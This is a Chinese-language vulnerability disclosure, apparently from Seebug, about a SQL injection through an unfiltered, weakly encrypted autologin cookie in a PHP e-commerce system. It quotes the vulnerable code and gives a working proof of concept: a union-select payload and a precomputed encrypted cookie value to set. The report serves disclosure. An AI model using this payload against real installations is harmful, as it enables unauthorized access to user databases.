### 简要描述:
cookie没有过滤导致sql注入
### 详细说明:
首先看cookie的加密:
```
///加解密算法
private static function code($string, $op="decode", $key='', $expiry=0)
///加密算法调用:
$value = Crypt::encode($value,self::getSafeCode());
///解密算法的调用:
$cookie= Crypt::decode($cryptCookie,self::getSafeCode());
```
这里的关键就是self::getSafeCode()
```
public static function getSafeCode()
{
if(self::$safeCode == '')self::setSafeCode();
return self::$safeCode;
}
public static function setSafeCode($scode='')
{
self::$safeCode = $scode.self::cookieId();
}
private static function cookieId()
{
if(self::$safeLave==0)return 1;
if(self::$safeLave==1) return md5(Chips::getIP());
if(self::$safeLave==2) return md5(Chips::getIP().$_SERVER["HTTP_USER_AGENT"]);
}
```
这就说明 整个cookie的加密秘钥无非是三种情况,而且这三种都是用户可以获取的。而且默认就是第一种方式,也就是key=1.
在来看方法:(classes/common.php)
```
//自动登录时的用户信息
static function autoLoginUserInfo()
{
$cookie = new Cookie();
$cookie->setSafeCode(Tiny::app()->getSafeCode());
$autologin = $cookie->get('autologin');
$obj = null;
if($autologin!=null){
$email = $autologin['email'];
$password = $autologin['password'];
$model = new Model("user as us");
$obj = $model->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.email='$email'")->find();
if($obj['password'] != $password){
$obj = null;
}
}
return $obj;
}
```
这里获取了autologin 这个cookie值,再来看获取方式:
```
public static function get($name)
{
if(self::checkSafe()==1)
{
if(isset($_COOKIE[self::$per.$name]))
{
$cryptCookie = $_COOKIE[self::$per.$name];
$cookie= Crypt::decode($cryptCookie,self::getSafeCode());
$tem = substr($cookie,0,10);
if(preg_match('/^[Oa]:\d+:.*/',$tem)) $cookie = unserialize($cookie);
return $cookie;
}
return null;
}
if(self::checkSafe()==0) self::clear($name);// Tiny::msg('非法窃取COOKIE,系统将终止工作!',0);
else return null;
}
```
在这里看到cookie只是在解密后做了一次反序列换转换,这就导致了直接被带入到了后端的sql语句中。
这里以默认的$key=1作为poc例子:
注入的sql语句片段式: ' union select 1,user(),1,1,1,1,1,1,1#
序列化后加密得到密文:bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0
设置cookie:
safecode=1,
Tiny_autologin=bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0
然后访问首页即可看到用户名
[<img src="https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png" alt="BaiduHi_2014-9-4_21-28-16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png)
[<img src="https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png" alt="BaiduHi_2014-9-4_21-28-24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png)
[<img src="https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png" alt="BaiduHi_2014-9-4_21-28-47.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png" alt="BaiduHi_2014-9-4_21-28-16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png)
[<img src="https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png" alt="BaiduHi_2014-9-4_21-28-24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png)
[<img src="https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png" alt="BaiduHi_2014-9-4_21-28-47.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png)
京公网安备 11010502034610号
暂无评论